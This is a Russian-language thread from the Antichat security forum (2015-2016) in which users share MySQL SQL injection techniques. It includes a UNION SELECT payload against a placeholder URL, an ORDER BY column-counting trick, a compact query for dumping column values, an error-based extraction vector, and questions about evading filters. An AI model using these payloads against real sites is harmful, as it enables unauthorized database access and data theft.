ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.04.2015, 21:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
10028
Репутация:
0
|
|
Может есть софт который проверяет параметры страницы на инъекцию?
а то бывает что данные не выводятся, или ещё что-то такое.
|
|
|
|
29.04.2015, 16:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
5818
Репутация:
0
|
|
интересует вот что
INFORMATION_SCHEMA.TABLES открывается вот таким способом
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 --
если кроме INFORMATION_SCHEMA на сайте есть
bd1
db2
как их открыть? |
|
|
|
11.06.2015, 17:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от psihoz26
psihoz26 said:
↑
Хочу добавить про подбор колонок в 1 запрос.
В случае если sqli выводит ошибки и пэйлоад вида
Код:
Code:
*+order+by+100+--+
выдаст нам ошибку
Код:
Code:
Query failed: Unknown column '100' in 'order clause'
То сразу смело вставляем такой пэйлоад
Код:
Code:
+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70+--+
В ответ получим
Код:
Code:
Query failed: Unknown column '*' in 'order clause'
Где '*'-1='колличество наших колонок'.
|
|
|
|
11.06.2015, 18:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
182660
Репутация:
324
|
|
|
|
|
|
26.11.2015, 07:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
370
Репутация:
0
|
|
Сообщение от Strilo4ka
Strilo4ka said:
↑
И напоследок значения с колонок(без пробелов!)
SELECT(MID(CONCAT(@p:=0x20,(SELECT(COUNT(*))FROM({ TABLE})WHERE@p:=CONCAT(@p,0x0D0A,{COLUMN1},0x3a,{C OLUMN2})),@p),5)) Приветствую! А подскажите как правильно преобразоватть этот запрос с оператором LIMIT, что бы мне выводилось, к примеру, из COLUMN1,COLUMN2 только первые 5к записей, а не все сразу.
|
|
|
|
27.12.2015, 11:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
5498
Репутация:
31
|
|
Если вдруг кому будет интересно, немного о том почему вообще работает метод вывода данных в тексте ошибки Duplicate entry '[data]' for key 'group_key'вынес в отдельную статью:
Error-Based SQL injection в MySQL
И максимально сокращенный вектор этого метода выглядит теперь вот так:
Код:
Code:
SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2)x GROUP BY MID([YOUR_QUERY], FLOOR(RAND(33)*2), 64)
|
|
|
|
27.09.2016, 00:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
294
Репутация:
0
|
|
Вопрос) Если в инъекции нельзя заюзать точку и тем самым не могу сделать например [...] SELECT * FROM INFORMATION_SCHEMA.TABLES [...] пробовал заюзать CHAR() но почему-то в названии таблицы не пашет
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
